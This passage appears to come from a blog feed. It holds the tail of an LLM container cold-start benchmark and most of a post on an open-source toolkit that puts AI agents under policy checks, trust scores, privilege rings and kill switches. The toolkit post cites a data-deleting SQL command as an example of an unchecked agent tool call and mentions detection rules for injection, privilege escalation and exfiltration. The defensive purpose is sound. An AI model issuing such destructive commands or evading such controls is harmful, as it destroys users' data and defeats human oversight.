&lt;P&gt;Even with prefetch, Nydus first inference is ~28s slower than overlayfs (72s vs 44s) due to FUSE kernel-user roundtrips during model mmap. Nydus wins on total TTFT because it eliminates the blocking pull, but this overhead means its advantage shrinks on faster networks.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Bottom line:&lt;/STRONG&gt; Nydus lazy-pull can halve cold-start for pull-bound engines, but only if prefetch is on. Treat prefetch_all=true as a hard requirement, not a tuning knob.&lt;/P&gt;
&lt;H2&gt;How to apply these findings&lt;/H2&gt;
&lt;H3&gt;Pick your optimization by engine type&lt;/H3&gt;
&lt;P&gt;The right optimization depends on where your engine spends its cold-start time. This table summarizes the tradeoffs:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Engine type&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Dominant phase&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Speedup from dropping gzip&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Nydus viable?&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Best optimization&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;What NOT to optimize&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;vLLM / TensorRT-LLM&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Startup (56%)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;1.02x&lt;/STRONG&gt; — negligible&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;No — FUSE + Python/CUDA stack exceeded 900s in our tests&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Cache torch.compile artifacts and CUDA graphs&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Pull pipeline (it’s &amp;lt;44% of TTFT and already fast enough)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;llama.cpp / ONNX Runtime&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Pull (64%)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;1.35x&lt;/STRONG&gt; — 36s saved&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Yes, with prefetch_all=true (77.8s TTFT vs 102.4s uncompressed baseline)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Drop gzip on weight layers; consider lazy-pull on slow links&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Startup (already 2–5s; no room to improve)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Large dense models (70B+)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Pull (projected)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;&amp;gt;1.35x&lt;/STRONG&gt; — scales with image size&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Yes, strongest case for lazy-pull&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Uncompressed or zstd; Nydus prefetch on bandwidth-constrained links&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;—&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H3&gt;Recommendations&lt;/H3&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;Profile your engine’s startup before touching the pull pipeline.&lt;/STRONG&gt; If CUDA compilation dominates (vLLM, TensorRT-LLM), no amount of pull optimization will help. Cache torch.compile artifacts and CUDA graphs instead.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Drop gzip on model weight layers.&lt;/STRONG&gt; For pull-bound engines (llama.cpp, ONNX Runtime), this is the single highest-ROI change: build with --output=type=image,compression=uncompressed, or use &lt;A href="https://github.com/kaito-project/aikit" target="_blank"&gt;AIKit&lt;/A&gt;, which defaults to uncompressed weight layers. Quantized model weights (GGUF, safetensors) are already dense binary — gzip burns CPU for negligible size reduction.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;If using Nydus, set &lt;/STRONG&gt;&lt;STRONG&gt;prefetch_all=true&lt;/STRONG&gt;&lt;STRONG&gt;.&lt;/STRONG&gt; Without it, every weight page fault triggers an individual HTTP range request and cold-start is &lt;STRONG&gt;2.87x slower&lt;/STRONG&gt;. This is a single flag in nydusd-config.json.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Package models as signed OCI artifacts, not volume mounts.&lt;/STRONG&gt; Three CNCF projects implement this pipeline end-to-end: &lt;A href="https://github.com/modelpack/model-spec" target="_blank"&gt;ModelPack&lt;/A&gt; defines the OCI artifact spec (model metadata, architecture, quantization format). &lt;A href="https://github.com/kaito-project/aikit" target="_blank"&gt;AIKit&lt;/A&gt; builds ModelPack-compliant images with Cosign signatures, SBOMs, and provenance attestations — supply chain guarantees you lose when weights live on a shared drive. &lt;A href="https://github.com/kaito-project/kaito" target="_blank"&gt;KAITO&lt;/A&gt; handles the Kubernetes deployment: GPU node provisioning, inference engine setup, and API exposure. Together they cover packaging → build → deploy, and they produce the exact image layout these benchmarks measured.&lt;/LI&gt;
&lt;/OL&gt;
&lt;H3&gt;Why this matters: the cost of cold-start&lt;/H3&gt;
&lt;P&gt;On an A100 node (~$3–4/hr on major clouds), a 5-minute vLLM cold start burns ~$0.30 in idle GPU time per pod. That sounds small until you multiply it: a cluster that scales 50 pods to zero overnight and restarts them each morning wastes ~$15/day — over $5,000/year — on GPUs sitting idle during pull and CUDA compilation. More critically, cold-start latency determines whether scale-to-zero is feasible at all. If cold-start exceeds your SLO (say, 30s for an interactive app), you’re forced to keep warm replicas running 24/7, which can 2–3x your GPU spend.&lt;/P&gt;
&lt;H2&gt;What this doesn’t cover&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;zstd compression:&lt;/STRONG&gt; decompresses 5–10x faster than gzip; containerd supports it natively. The most obvious gap in this analysis.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Pre-pulling and caching:&lt;/STRONG&gt; production clusters pre-pull images and can cache CUDA compilation artifacts, substantially reducing restart times. We measure the cold case: scale-from-zero events and first-time deployments.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Volume-mounted weights:&lt;/STRONG&gt; skips the pull entirely, but loses supply chain properties (signing, scanning, provenance).&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Larger models (70B+):&lt;/STRONG&gt; pull would dominate more, increasing the gzip penalty.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Sample size:&lt;/STRONG&gt; n=3 per AIKit variant, n=2–3 per vLLM variant. The gzip finding for llama.cpp is statistically significant (Welch’s t-test, p=0.0014, Cohen’s d=16.3; &lt;A href="https://github.com/robert-cronin/erofs-repro-repo/blob/main/results/verify-significance.py" target="_blank"&gt;verification script&lt;/A&gt;). Other comparisons are directional.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Reproduce it&lt;/H2&gt;
&lt;P&gt;Scripts and raw data: &lt;A href="https://github.com/robert-cronin/erofs-repro-repo" target="_blank"&gt;erofs-repro-repo&lt;/A&gt;. Data for this post: &lt;A href="https://github.com/robert-cronin/erofs-repro-repo/blob/main/results/02-aikit-five-way-20260401-004716.csv" target="_blank"&gt;02-aikit-five-way-20260401-004716.csv&lt;/A&gt; and &lt;A href="https://github.com/robert-cronin/erofs-repro-repo/blob/main/results/01-vllm-four-way-20260331-113848.csv" target="_blank"&gt;01-vllm-four-way-20260331-113848.csv&lt;/A&gt;. Full analysis: &lt;A href="https://github.com/robert-cronin/erofs-benchmarks/blob/main/docs/report/README.md" target="_blank"&gt;technical report&lt;/A&gt;.&lt;/P&gt;</description>
      <pubDate>Mon, 27 Apr 2026 11:36:05 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/dissecting-llm-container-cold-start-where-the-time-actually-goes/ba-p/4508831</guid>
      <dc:creator>robcronin</dc:creator>
      <dc:date>2026-04-27T11:36:05Z</dc:date>
    </item>
    <item>
      <title>Agent Governance Toolkit: Architecture Deep Dive, Policy Engines, Trust, and SRE for AI Agents</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/agent-governance-toolkit-architecture-deep-dive-policy-engines/ba-p/4510105</link>
      <description>&lt;P&gt;Last week we announced the &lt;A class="lia-external-url" href="https://aka.ms/agt-opensource-blog" target="_blank"&gt;Agent Governance Toolkit&lt;/A&gt; on the Microsoft Open Source Blog, an open-source project that brings runtime security governance to autonomous AI agents. In that announcement, we covered the&amp;nbsp;&lt;STRONG&gt;why&lt;/STRONG&gt;: AI agents are making autonomous decisions in production, and the security patterns that kept systems safe for decades need to be applied to this new class of workload.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;In this post, we'll go deeper into the&amp;nbsp;&lt;STRONG&gt;how&lt;/STRONG&gt;: the architecture, the implementation details, and what it takes to run governed agents in production.&lt;/P&gt;
&lt;H2&gt;The Problem: Production Infrastructure Meets Autonomous Agents&lt;/H2&gt;
&lt;P&gt;If you manage production infrastructure, you already know the playbook: least privilege, mandatory access controls, process isolation, audit logging, and circuit breakers for cascading failures. These patterns have kept production systems safe for decades.&lt;/P&gt;
&lt;P&gt;Now imagine a new class of workload arriving on your infrastructure, AI agents that autonomously execute code, call APIs, read databases, and spawn sub-processes. They reason about what to do, select tools, and act in loops. And in many current deployments, they do all of this without the security controls you'd demand of any other production workload.&lt;/P&gt;
&lt;P&gt;That gap is what led us to build the &lt;A class="lia-external-url" href="https://aka.ms/agent-governance-toolkit" target="_blank"&gt;Agent Governance Toolkit&lt;/A&gt;: an open-source project, that applies proven security concepts from operating systems, service meshes, and SRE to the emerging world of autonomous AI agents.&lt;/P&gt;
&lt;P&gt;To frame this in familiar terms: most AI agent frameworks today are like running every process as root, no access controls, no isolation, no audit trail. The Agent Governance Toolkit is the kernel, the service mesh, and the SRE platform for AI agents.&lt;/P&gt;
&lt;P&gt;When an agent calls a tool, say, `DELETE FROM users WHERE created_at &amp;lt; NOW()`, there is typically no policy layer checking whether that action is within scope. There is no identity verification when one agent communicates with another. There is no resource limit preventing an agent from making 10,000 API calls in a minute. And there is no circuit breaker to contain cascading failures when things go wrong.&lt;/P&gt;
&lt;H2&gt;OWASP Agentic Security Initiative&lt;/H2&gt;
&lt;P&gt;In December 2025, &lt;A class="lia-external-url" href="https://aka.ms/agt-owasp" target="_blank"&gt;OWASP published the Agentic AI Top 10:&lt;/A&gt;&amp;nbsp;the first formal taxonomy of risks specific to autonomous AI agents. The list reads like a security engineer's nightmare: goal hijacking, tool misuse, identity abuse, memory poisoning, cascading failures, rogue agents, and more.&lt;/P&gt;
&lt;P&gt;If you've ever hardened a production server, these risks will feel both familiar and urgent. The Agent Governance Toolkit is designed to help address all 10 of these risks through deterministic policy enforcement, cryptographic identity, execution isolation, and reliability engineering patterns.&lt;/P&gt;
&lt;P&gt;&lt;EM&gt;&lt;STRONG&gt;Note&lt;/STRONG&gt;: The OWASP Agentic Security Initiative has since adopted the ASI 2026 taxonomy (ASI01–ASI10). The toolkit's copilot-governance package now uses these identifiers with backward compatibility for the original AT numbering.&lt;/EM&gt;&lt;/P&gt;
&lt;H2&gt;Architecture: Nine Packages, One Governance Stack&lt;/H2&gt;
&lt;P&gt;The toolkit is structured as a v3.0.0 Public Preview monorepo with nine independently &lt;A class="lia-external-url" href="https://aka.ms/agt-install" target="_blank"&gt;installable packages:&lt;/A&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Package&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What It Does&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agent OS&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Stateless policy engine, intercepts agent actions before execution with configurable pattern matching and semantic intent classification&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agent Mesh&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Cryptographic identity (DIDs with Ed25519), Inter-Agent Trust Protocol (IATP), and trust-gated communication between agents&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agent Hypervisor&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Execution rings inspired by CPU privilege levels, saga orchestration for multi-step transactions, and shared session management&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agent Runtime&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Runtime supervision with kill switches, dynamic resource allocation, and execution lifecycle management&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agent SRE&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;SLOs, error budgets, circuit breakers, chaos engineering, and progressive delivery, production reliability practices adapted for AI agents&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agent Compliance&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Automated governance verification with compliance grading and regulatory framework mapping (EU AI Act, NIST AI RMF, HIPAA, SOC 2)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agent Lightning&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Reinforcement learning training governance with policy-enforced runners and reward shaping&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agent Marketplace&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Plugin lifecycle management with Ed25519 signing, trust-tiered capability gating, and SBOM generation&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Integrations&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;20+ framework adapters for LangChain, CrewAI, AutoGen, Semantic Kernel, Google ADK, Microsoft Agent Framework, OpenAI Agents SDK, and more&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2&gt;Agent OS: The Policy Engine&lt;/H2&gt;
&lt;P&gt;Agent OS intercepts agent tool calls before they execute:&lt;/P&gt;
&lt;P&gt;from agent_os import StatelessKernel, ExecutionContext, Policy&lt;BR /&gt;&lt;BR /&gt;kernel = StatelessKernel()&lt;BR /&gt;ctx = ExecutionContext(&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; agent_id="analyst-1",&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; policies=[&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Policy.read_only(),&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; # No write operations&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Policy.rate_limit(100, "1m"),&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; # Max 100 calls/minute&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Policy.require_approval(&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; actions=["delete_*", "write_production_*"],&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; min_approvals=2,&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; approval_timeout_minutes=30,&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ),&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ],&lt;BR /&gt;)&lt;BR /&gt;&lt;BR /&gt;result = await kernel.execute(&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; action="delete_user_record",&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; params={"user_id": 12345},&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; context=ctx,&lt;BR /&gt;)&lt;/P&gt;
&lt;P&gt;The policy engine works in two layers: configurable pattern matching (with sample rule sets for SQL injection, privilege escalation, and prompt injection that users customize for their environment) and a semantic intent classifier that helps detect dangerous goals regardless of phrasing. When an action is classified as `DESTRUCTIVE_DATA`, `DATA_EXFILTRATION`, or `PRIVILEGE_ESCALATION`, the engine blocks it, routes it for human approval, or downgrades the agent's trust level, depending on the configured policy.&lt;/P&gt;
&lt;P&gt;&lt;EM&gt;&lt;STRONG&gt;Important&lt;/STRONG&gt;: All policy rules, detection patterns, and sensitivity thresholds are externalized to YAML configuration files. The toolkit ships with sample configurations in `examples/policies/` that must be reviewed and customized before production deployment. No built-in rule set should be considered exhaustive. Policy languages supported: YAML, OPA Rego, and Cedar.&lt;/EM&gt;&lt;/P&gt;
&lt;P&gt;The kernel is stateless by design, each request carries its own context. This means you can deploy it behind a load balancer, as a sidecar container in Kubernetes, or in a serverless function, with no shared state to manage. On AKS or any Kubernetes cluster, it fits naturally into existing deployment patterns. Helm charts are available for agent-os, agent-mesh, and agent-sre.&lt;/P&gt;
&lt;H2&gt;Agent Mesh: Zero-Trust Identity for Agents&lt;/H2&gt;
&lt;P&gt;In service mesh architectures, services prove their identity via mTLS certificates before communicating. AgentMesh applies the same principle to AI agents using decentralized identifiers (DIDs) with Ed25519 cryptography and the Inter-Agent Trust Protocol (IATP):&lt;/P&gt;
&lt;P&gt;from agentmesh import AgentIdentity, TrustBridge&lt;BR /&gt;&lt;BR /&gt;identity = AgentIdentity.create(&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; name="data-analyst",&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; sponsor="alice@company.com",&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; # Human accountability&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; capabilities=["read:data", "write:reports"],&lt;BR /&gt;)&lt;BR /&gt;# identity.did -&amp;gt; "did:mesh:data-analyst:a7f3b2..."&lt;BR /&gt;&lt;BR /&gt;bridge = TrustBridge()&lt;BR /&gt;verification = await bridge.verify_peer(&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; peer_id="did:mesh:other-agent",&lt;BR /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; required_trust_score=700,&amp;nbsp; # Must score &amp;gt;= 700/1000&lt;BR /&gt;)&lt;/P&gt;
&lt;P&gt;A critical feature is&amp;nbsp;&lt;STRONG&gt;trust decay&lt;/STRONG&gt;: an agent's trust score decreases over time without positive signals. An agent trusted last week but silent since then gradually becomes untrusted, modeling the reality that trust requires ongoing demonstration, not a one-time grant.&lt;/P&gt;
&lt;P&gt;Delegation chains enforce &lt;STRONG&gt;scope narrowing&lt;/STRONG&gt;: a parent agent with read+write permissions can delegate only read access to a child agent, never escalate.&lt;/P&gt;
&lt;H2&gt;Agent Hypervisor: Execution Rings&lt;/H2&gt;
&lt;P&gt;CPU architectures use privilege rings (Ring 0 for kernel, Ring 3 for userspace) to isolate workloads. The Agent Hypervisor applies this model to AI agents:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Ring&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Trust Level&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Capabilities&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Ring 0 (Kernel)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Score ≥ 900&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Full system access, can modify policies&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Ring 1 (Supervisor)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Score ≥ 700&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Cross-agent coordination, elevated tool access&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Ring 2 (User)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Score ≥ 400&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Standard tool access within assigned scope&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Ring 3 (Untrusted)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Score &amp;lt; 400&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Read-only, sandboxed execution only&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;New and untrusted agents start in Ring 3 and earn their way up, exactly the principle of least privilege that production engineers apply to every other workload.&lt;/P&gt;
&lt;P&gt;Each ring enforces per-agent resource limits: maximum execution time, memory caps, CPU throttling, and request rate limits. If a Ring 2 agent attempts a Ring 1 operation, it gets blocked, just like a userspace process trying to access kernel memory.&lt;/P&gt;
&lt;P&gt;These ring definitions and their associated trust score thresholds are fully configurable via policy. Organizations can define custom ring structures, adjust the number of rings, set different trust score thresholds for transitions, and configure per-ring resource limits to match their security requirements.&lt;/P&gt;
&lt;P&gt;The hypervisor also provides&amp;nbsp;&lt;STRONG&gt;saga orchestration&lt;/STRONG&gt;&amp;nbsp;for multi-step operations. When an agent executes a sequence, draft email → send → update CRM, and the final step fails, compensating actions fire in reverse. Borrowed from distributed transaction patterns, this ensures multi-agent workflows maintain consistency even when individual steps fail.&lt;/P&gt;
&lt;H2&gt;Agent SRE: SLOs and Circuit Breakers for Agents&lt;/H2&gt;
&lt;P&gt;If you practice SRE, you measure services by SLOs and manage risk through error budgets. Agent SRE extends this to AI agents:&lt;/P&gt;
&lt;P&gt;When an agent's safety SLI drops below 99 percent, meaning more than 1 percent of its actions violate policy, the system automatically restricts the agent's capabilities until it recovers. This is the same error-budget model that SRE teams use for production services, applied to agent behavior.&lt;/P&gt;
&lt;P&gt;We also built nine chaos engineering fault injection templates: network delays, LLM provider failures, tool timeouts, trust score manipulation, memory corruption, and concurrent access races. Because the only way to know if your agent system is resilient is to break it intentionally.&lt;/P&gt;
&lt;P&gt;Agent SRE integrates with your existing observability stack through adapters for Datadog, PagerDuty, Prometheus, OpenTelemetry, Langfuse, LangSmith, Arize, MLflow, and more. Message broker adapters support Kafka, Redis, NATS, Azure Service Bus, AWS SQS, and RabbitMQ.&lt;/P&gt;
&lt;H2&gt;Compliance and Observability&lt;/H2&gt;
&lt;P&gt;If your organization already maps to CIS Benchmarks, NIST AI RMF, or other frameworks for infrastructure compliance, the OWASP Agentic Top 10 is the equivalent standard for AI agent workloads. The toolkit's agent-compliance package provides automated governance grading against these frameworks.&lt;/P&gt;
&lt;P&gt;The toolkit is framework-agnostic, with 20+ adapters that hook into each framework's native extension points, so adding governance to an existing agent is typically a few lines of configuration, not a rewrite.&lt;/P&gt;
&lt;P&gt;The toolkit exports metrics to any OpenTelemetry-compatible platform, Prometheus, Grafana, Datadog, Arize, or Langfuse. If you're already running an observability stack for your infrastructure, agent governance metrics flow through the same pipeline.&lt;/P&gt;
&lt;P&gt;Key metrics include: policy decisions per second, trust score distributions, ring transitions, SLO burn rates, circuit breaker state, and governance workflow latency.&lt;/P&gt;
&lt;H2&gt;Getting Started&lt;/H2&gt;
&lt;P&gt;# Install all packages&lt;BR /&gt;pip install agent-governance-toolkit[full]&lt;BR /&gt;&lt;BR /&gt;# Or individual packages&lt;BR /&gt;pip install agent-os-kernel agent-mesh agent-sre&lt;/P&gt;
&lt;P&gt;The toolkit is available across language ecosystems: Python, TypeScript (`@microsoft/agentmesh-sdk` on npm), Rust, Go, and .NET (`Microsoft.AgentGovernance` on NuGet).&lt;/P&gt;
&lt;H2&gt;Azure Integrations&lt;/H2&gt;
&lt;P&gt;While the toolkit is platform-agnostic, we've included integrations that help enable the fastest path to production, on Azure:&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Azure Kubernetes Service (AKS):&lt;/STRONG&gt; Deploy the policy engine as a sidecar container alongside your agents. Helm charts provide production-ready manifests for agent-os, agent-mesh, and agent-sre.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Azure AI Foundry Agent Service:&lt;/STRONG&gt; Use the built-in middleware integration for agents deployed through Azure AI Foundry.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;OpenClaw Sidecar:&lt;/STRONG&gt; One compelling deployment scenario is running&amp;nbsp;&lt;A class="lia-external-url" href="https://github.com/openclaw" target="_blank"&gt;OpenClaw&lt;/A&gt;, the open-source autonomous agent, inside a container with the Agent Governance Toolkit deployed as a sidecar. This gives you policy enforcement, identity verification, and SLO monitoring over OpenClaw's autonomous operations. On Azure Kubernetes Service (AKS), the deployment is a standard pod with two containers: OpenClaw as the primary workload and the governance toolkit as the sidecar, communicating over localhost. We have a reference architecture and&amp;nbsp;&lt;A class="lia-external-url" href="https://aka.ms/agt-helm" target="_blank"&gt;Helm chart available in the repository&lt;/A&gt;.&lt;/P&gt;
&lt;P&gt;The same sidecar pattern works with any containerized agent, OpenClaw is a particularly compelling example because of the interest in autonomous agent safety.&lt;/P&gt;
&lt;H2&gt;Tutorials and Resources&lt;/H2&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://aka.ms/agt-tutorials" target="_blank"&gt;34+ step-by-step tutorials&lt;/A&gt; covering policy engines, trust, compliance, MCP security, observability, and cross-platform SDK usage are available in the repository.&lt;/P&gt;
&lt;P&gt;git clone https://github.com/microsoft/agent-governance-toolkit&lt;BR /&gt;cd agent-governance-toolkit&lt;BR /&gt;pip install -e "packages/agent-os[dev]" -e "packages/agent-mesh[dev]" -e "packages/agent-sre[dev]"&lt;BR /&gt;&lt;BR /&gt;# Run the demo&lt;BR /&gt;python -m agent_os.demo&lt;/P&gt;
&lt;H2&gt;What's Next&lt;/H2&gt;
&lt;P&gt;AI agents are becoming autonomous decision-makers in production infrastructure, executing code, managing databases, and orchestrating services. The security patterns that kept production systems safe for decades, least privilege, mandatory access controls, process isolation, audit logging, are exactly what these new workloads need. We built them. They're open source.&lt;/P&gt;
&lt;P&gt;We're building this in the open because agent security is too important for any single organization to solve alone:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Security research&lt;/STRONG&gt;: Adversarial testing, red-team results, and vulnerability reports strengthen the toolkit for everyone.&lt;/LI&gt;
